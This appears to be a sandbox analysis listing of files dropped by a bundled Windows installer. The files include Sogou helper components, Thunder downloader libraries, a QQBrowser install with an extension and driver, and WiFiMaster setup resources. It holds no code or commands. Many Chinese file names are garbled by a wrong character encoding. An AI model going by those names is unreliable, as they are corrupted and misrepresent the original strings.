%Documents and Settings%\All Users\Application Data\Thunder Network\Mini_downloadlib\ODAwMDAzNzI=\200U (164 bytes)
%Documents and Settings%\All Users\Application Data\Thunder Network\Mini_downloadlib\ODAwMDAzNzI=\Version_3_2_1_42\Profiles\download.cfg (1007 bytes)
C:\SogouDownload\WiFi-2175.exe.td.cfg (21563 bytes)
%Program Files%\SogouSoftware\download\download\.svn\prop-base\atl71.dll.svn-base (53 bytes)
%Program Files%\SogouSoftware\download\download\.svn\text-base\msvcp71.dll.svn-base (10930 bytes)
%Program Files%\SogouSoftware\download\download\ThunderFW.exe (3053 bytes)
%Program Files%\SogouSoftware\download\download\.svn\text-base\id.dat.svn-base (40 bytes)
%Program Files%\SogouSoftware\download\download\.svn\all-wcprops (1 bytes)
%Program Files%\SogouSoftware\download\download\.svn\prop-base\download_engine.dll.svn-base (53 bytes)
%Program Files%\SogouSoftware\SogouSoftwareLoader.dll (11043 bytes)
%Program Files%\SogouSoftware\download\download\.svn\prop-base\MiniTPFw.exe.svn-base (53 bytes)
%Program Files%\SogouSoftware\download\download\.svn\text-base\MiniThunderPlatform.exe.svn-base (7951 bytes)
%Program Files%\SogouSoftware\download\download\.svn\entries (1 bytes)
%Program Files%\SogouSoftware\download\download\.svn\prop-base\MiniThunderPlatform.exe.svn-base (53 bytes)
%Program Files%\SogouSoftware\download\xldl.dll (9424 bytes)
%Program Files%\SogouSoftware\download\download\.svn\prop-base\zlib1.dll.svn-base (53 bytes)
%Program Files%\SogouSoftware\download\download\.svn\format (2 bytes)
%Program Files%\SogouSoftware\download\download\.svn\text-base\download_engine.dll.svn-base (75696 bytes)
%Program Files%\SogouSoftware\download\download\.svn\text-base\msvcr71.dll.svn-base (12773 bytes)
%Program Files%\SogouSoftware\download\download\msvcp71.dll (10930 bytes)
%Program Files%\SogouSoftware\download\download\MiniThunderPlatform.exe (7951 bytes)
%Program Files%\SogouSoftware\SogouSoftware.exe (6861 bytes)
%Program Files%\SogouSoftware\crash\.svn\entries (440 bytes)
%Program Files%\SogouSoftware\download\download\.svn\prop-base\ThunderFW.exe.svn-base (53 bytes)
%Program Files%\SogouSoftware\download\download\id.dat (40 bytes)
%Program Files%\SogouSoftware\crash\.svn\prop-base\ExceptionReport.exe.svn-base (53 bytes)
%Program Files%\SogouSoftware\download\download\.svn\prop-base\msvcr71.dll.svn-base (53 bytes)
%Program Files%\SogouSoftware\download\download\download_engine.dll (75696 bytes)
%Program Files%\SogouSoftware\download\download\zlib1.dll (3170 bytes)
%Program Files%\SogouSoftware\crash\.svn\all-wcprops (301 bytes)
%Program Files%\SogouSoftware\download\download\.svn\text-base\dl_peer_id.dll.svn-base (2910 bytes)
%Program Files%\SogouSoftware\download\download\.svn\prop-base\dl_peer_id.dll.svn-base (53 bytes)
%Program Files%\SogouSoftware\download\download\msvcr71.dll (12773 bytes)
%Program Files%\SogouSoftware\crash\.svn\format (2 bytes)
%Program Files%\SogouSoftware\crash\ExceptionReport.exe (3718 bytes)
%Program Files%\SogouSoftware\download\download\MiniTPFw.exe (1633 bytes)
%Program Files%\SogouSoftware\download\download\.svn\text-base\atl71.dll.svn-base (2201 bytes)
%Program Files%\SogouSoftware\download\download\.svn\text-base\ThunderFW.exe.svn-base (3053 bytes)
%Program Files%\SogouSoftware\download\download\.svn\prop-base\msvcp71.dll.svn-base (53 bytes)
%Program Files%\SogouSoftware\crash\.svn\text-base\ExceptionReport.exe.svn-base (3718 bytes)
%Program Files%\SogouSoftware\download\download\.svn\text-base\MiniTPFw.exe.svn-base (1633 bytes)
%Program Files%\SogouSoftware\download\download\atl71.dll (2201 bytes)
%Program Files%\SogouSoftware\download\download\dl_peer_id.dll (2910 bytes)
%Program Files%\SogouSoftware\download\download\.svn\text-base\zlib1.dll.svn-base (3170 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49UBGDUB\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXEFKT6V\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C9MJ0H6Z\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9EV8X6B\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\minidownload.exe (12289 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Extensions\ghgfpcpdfhmoghgepjalhnielnlemggj\9.0.0.31_0\BrowserProtect18.exe (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\9.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Preferences (41 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_2328_4795\CRX_INSTALL\manifest.json (1115 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_2328_4795\CRX_INSTALL\background.js (6984 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_2328_4795\DECODED_IMAGES (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_2328_4795\DECODED_MESSAGE_CATALOGS (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_2328_4795\CRX_INSTALL\background.html (91 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_2328_4795\commenExtension.crx (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_2328_4795\CRX_INSTALL\s5-iframe.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\it\messages.json (487 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\images\topbar_floating_button_maximize.png (166 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\ja\messages.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\vi\messages.json (723 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\th\messages.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\de\messages.json (570 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\sr\messages.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\images\icon_16.png (531 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\id\messages.json (474 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\ca\messages.json (594 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\zh_TW\messages.json (731 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\images\topbar_floating_button_hover.png (160 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\es\messages.json (585 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\images\topbar_floating_button_pressed.png (160 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\sv\messages.json (554 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\en\messages.json (474 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\tr\messages.json (607 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\el\messages.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\images\topbar_floating_button_close.png (252 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\images\flapper.gif (5224 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\uk\messages.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\bg\messages.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\ko\messages.json (763 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\da\messages.json (531 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\nl\messages.json (499 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\sl\messages.json (527 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\et\messages.json (478 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\appdata\xaml\ClearDialog.xaml (1 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\chrome_100_percent.pak (7971 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\tsurllib.dat (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\qqtrack.xml (5 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\qqbrowser.exe (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\navi.ico (104 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\driver\amd64\tsqbdrv.sys (601 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\libexif.dll (1425 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\QBSafe.dll (1640 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\snapshot_blob.bin (1795 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}_1\QBSafe.dll (1640 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\qb_100_percent.pak (1633 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\compat.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\chrome.dll (509544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\appdata\compat.xml (1 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\QQæµÂ览器.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\Config.xml (624 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\chrome_100_percent.pak (7386 bytes)
%Documents and Settings%\%current user%\Application Data\QB\app.ico (284 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\BugReport.exe (2321 bytes)
%Documents and Settings%\%current user%\Application Data\QB\QQæµÂ览器.lnk (1 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\F1Assistant.dll (19686 bytes)
%Documents and Settings%\%current user%\Application Data\WiFiMaster\LocalConfigure.db (18929 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\ç»§ç»Â使çâ€Â¨ 点击.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\完æˆÂ按钮 未点击.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\点.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\自定义.png (984 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu6.tmp (730245 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\完æˆÂ按钮 点击.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\ç»§ç»Â使çâ€Â¨ 未点击.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\勾选 点击.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss8.tmp\SetupPlugin.dll (131925 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\å–消.png (972 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\å–消 未点击.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\icon.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\InstallPackages3.xml (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss8.tmp\FindProcDLL.dll (16944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\快速安装ä¸Âå¯点击.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\InstallPackages2.xml (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\最å°Â化 未点击.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\快速安装 未点击.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\一éâ€Â®Ã¤Â¿Â®Ã¥Â¤Â-æÂ£å¸¸.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\UninstallPackages.xml (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\关闠未点击.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\进度æÂ¡.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\确定å¸载 点击.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\专家在线æâ€Â¯Ã¦Å’Â-ç»Â过.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\bg1.png (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\bg3.png (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\一éâ€Â®Ã¤Â¿Â®Ã¥Â¤Â-ç»Â过.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\勾选 未点击.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\å–消 点击.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\最å°Â化 点击.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\WiFiMaster\LocalConfigure.db-journal (115866 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\btn2.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\btn1.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\勾选-点击_ç°.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\å…³é—Â点击.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\确定å¸载 未点击.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\背景图.png (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\BrowseWnd.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\btn1_browse.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\bg2.png (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\专家在线æâ€Â¯Ã¦Å’Â-æÂ£å¸¸.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\专家在线æâ€Â¯Ã¦Å’Â-按下.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\一éâ€Â®Ã¤Â¿Â®Ã¥Â¤Â-按下.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\进度æÂ¡èƒŒæ™¯å±‚.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\btn2_browse.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\快速安装 点击.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss17.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\SSO\SSOCommon.dll (41699 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss17.tmp\InstallHelper.dll (6584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn16.tmp (78435 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\SSO\SSOPlatform.dll (48241 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\upgrade_stable_list_item.xml (5 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\button.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\continuebtn.png (819 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\edit.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\option_bk.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\white.png (163 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\9.png (18 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\beginexp.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\confirm_dlg.xml (2 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\update_nor.png (18 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\hover̬.png (17 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\uninstall_dwn.png (18 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\ËÑË÷ɾ³ý.png (17 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\USB.png (7 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\radio.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\combo_hot.png (350 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\AdbWinUsbApi.dll (2628 bytes)
%Program Files%\SogouSoftware\3.1.13.79\IEHint.dll (10252 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\newbutton.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\dlgClose_nor.png (1 bytes)
%Program Files%\SogouSoftware\update\USBDT.dll (14494 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\5.png (18 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\aapt.exe (22008 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\combo_right.png (1 bytes)
%Program Files%\SogouSoftware\update\UpdateService.exe (6928 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\follow_tip.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\grin.png (24 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\DrvInst32\DrvInst_x86.exe (10321 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\3.0.0.0\apktool.ini (44 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\combo_mask.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\DrvInst64\DrvInst_x64.exe (10382 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\logo3636.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\menu.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj4.tmp\System.dll (11 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\update_list_dlg_otherfont.xml (5 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\dlgClose_dwn.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\ScrollBar\scrollH.png (909 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\search_delete.png (17 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\info.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\SogouPhoneService.exe (22004 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\ins_progress_bg.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\upgrade_beta_list_item.xml (5 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\scroll_bk.png (3 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\update_hov.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\ins_progress_bk.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\recommend_hov.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\closebtn_hover.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\dlg_feedback.xml (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\recommend_selected.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\info_icon.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\beginbtn.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\tips_down.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\smallbtn.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\progress_bk.png (952 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\smalldlg_shadow.png (3 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\search_bar_nor.png (18 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\feedback_nor.png (17 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\check.png (1 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\ÈüþÖúÊÖ\öÃâ€ÃƒËœÃƒË†ÃƒÂ¼þÖúÊÖ.lnk (501 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\bottombk.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\combo_sel.png (347 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\4.png (18 bytes)
%Program Files%\SogouSoftware\update\SogouPDAInfo.sqlite3 (3624 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\classify_btn_pushed.png (130 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\apostrophe.gif (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\closebtn_normal.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\soft_search_list.xml (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\group_list_item.xml (693 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\downloading.gif (7 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\button140.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\phone_normal.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\allow_debug.png (2712 bytes)
%Program Files%\SogouSoftware\ÈüþÖúÊÖ.lnk (1284 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\update_dwn.png (18 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\DrvInst32\DIFxAPI.dll (12309 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\left_btn_mask.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\tab.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\menubtn.png (3 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\wait_dev.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\ins_confirm.png (632 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\progress_fore.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\close_act.png (17 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\download_hov.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\Õýʽ°æÑ¡ÖÃÂ״̬.png (15476 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\all_updated.png (9 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\download_bind_checkbox.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\setting_act.png (18 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\connect_dev.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\uninstall_list_item.xml (3 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\dlgClose_act.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\feedback_dwn.png (17 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\shy.png (5 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\update_info.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\ApkTool.xml (1568 bytes)
%Program Files%\SogouSoftware\3.1.13.79\CommonState.dll (1332 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\continuebtn_small.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\upgrade_ignore_list_item.xml (3 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\progress_bk.png (17660 bytes)
%Program Files%\SogouSoftware\3.1.13.79\npdownload.dll (8748 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\dlgshadow.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\icon_success.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\downloadComplete_list_item.xml (4 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\closebtn_normal_dlg.png (415 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\ins_title.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\down_smt.png (3 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\combo_left.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\setting_nor.png (18 bytes)
%Program Files%\SogouSoftware\3.1.13.79\SogouSoftware.dll (25317 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\SogouApkTool.exe (47860 bytes)
%Documents and Settings%\All Users\Desktop\ÈüþÖúÊÖ.lnk (720 bytes)
%Program Files%\SogouSoftware\manifest.cfg (30 bytes)
%Program Files%\SogouSoftware\3.1.13.79\sqlite3.dll (10053 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\ins_app2phone_arrow.png (2 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\AdbWinApi.dll (4250 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\1.png (18 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\menu_bk.png (2 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\combo_simple_up.png (15 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\download_nor.png (18 bytes)
%Program Files%\SogouSoftware\3.1.13.79\IEHint64.dll (10878 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\download_dwn.png (18 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\ÈüþÖúÊÖ\ÈüþÖúÊÖ.lnk (734 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\tab_bk.png (2 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\tooltip.png (2 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\default_pkgicon.png (2 bytes)
%Program Files%\SogouSoftware\3.1.13.79\npdownload64.dll (9079 bytes)
